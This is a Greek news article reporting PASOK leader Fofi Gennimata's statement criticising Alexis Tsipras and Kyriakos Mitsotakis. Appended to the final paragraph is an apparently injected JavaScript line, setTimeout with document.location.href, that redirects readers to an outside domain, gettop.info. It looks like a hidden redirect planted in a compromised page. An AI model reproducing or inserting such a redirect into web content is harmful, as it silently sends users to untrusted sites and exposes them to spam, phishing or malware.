Φώφη κατά Τσίπρα: Επανέλαβε τον γνωστό υποκριτικό εαυτό του

0
8

 

Έντονη κριτική στον πρωθυπουργό Αλέξη Τσίπρα αλλά και στον αρχηγό της αξιωματικής αντιπολίτευσης Κυριάκο Μητσοτάκη, για τα όσα ανέφεραν ο μεν πρώτος στη συνεδρίαση της ΚΕ του ΣΥΡΙΖΑ και ο δε δεύτερος στη συνέντευξη τύπου στη ΔΕΘ άσκησε με δήλωσή της η Φώφη Γεννηματά.

Για τα όσα είπε ο κ. Τσίπρας, η κ. Γεννηματά ανέφερε ότι «επανέλαβε το γνωστό υποκριτικό εαυτό του». «»Έκλαιγε» δήθεν για τους φτωχούς, που ο ίδιος οδηγεί σε πλήρη φτωχοποίηση και αδιέξοδο. Παρίστανε τον διώκτη της διαπλοκής αυτός που την κρύβει στον κόρφο του. Έκρυψε ότι δεν μπορεί να υλοποιήσει αυτά που υποσχέθηκε τις προάλλες στη ΔΕΘ. Μίλησε για Δημοκρατία, ενώ επιχειρεί καθημερινά να στήσει καθεστώς, με παρεμβάσεις στη δικαιοσύνη, στους θεσμούς, στα ΜΜΕ, στις Τράπεζες» υπογράμμισε η πρόεδρος του ΠΑΣΟΚ.

Όσον αφορά στις δηλώσεις Μητσοτάκη επεσήμανε: «Έσπευσε να αλλάξει ρόλους με τον κ. Τσίπρα στις υποσχέσεις. Δεν έκρυψε βέβαια τη δίκη του πολιτική ατζέντα. Πολιτική της Δεξιάς, συντηρητική, στηριγμένη μόνο στην αγορά. Ξέχασε παντελώς την κοινωνία. Έλλειψε το ενδιαφέρον για τον κόσμο της εργασίας, τον συνταξιούχο, τον αγρότη, τα ελληνικά νοικοκυριά, τους μικρομεσαίους. Δεν μας εκπλήσσει, αυτή είναι η ελληνική Δεξιά».

«Μόνο με αλλαγή των πολιτικών συσχετισμών και την ενίσχυση της Δημοκρατικής Συμπαράταξης, μπορεί να συγκροτηθεί η ισχυρή αναπτυξιακή συμμαχία κράτους-αγοράς-κοινωνίας που χρειάζεται η χώρα για να ξεκολλήσει από το τέλμα της ύφεσης και να βγει από την κρίση. Γι’ αυτό θα συνεχίσουμε να δουλεύουμε για ένα ισχυρό προοδευτικό ρεύμα της σύγχρονης Σοσιαλδημοκρατίας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here